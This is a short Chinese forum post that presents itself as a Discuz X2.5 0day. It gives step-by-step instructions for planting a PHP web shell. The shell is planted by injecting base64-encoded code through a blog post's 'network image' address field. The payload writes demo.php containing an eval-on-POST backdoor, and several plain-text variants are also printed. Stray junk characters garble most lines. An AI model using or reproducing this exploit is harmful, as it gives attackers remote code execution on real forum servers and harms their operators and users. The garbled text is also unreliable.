DZ X2.5最新0day9 B3 m- w+ S4 O; [( `, }! E" o
1.注册任意账户
# `0 E1 P0 t. ~ H* b# {: `2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
1 _0 S; W/ s! [4 {# o' S3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码6 S% G1 O( G1 @: d& I
<?php @eval($_POST[c]); ?>ok
. C( e2 x l2 X3 V0 [<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?> 8 f" @6 V+ n, i/ r& X* H
4.访问日志,论坛根目录下生成demo.php,一句发密码C |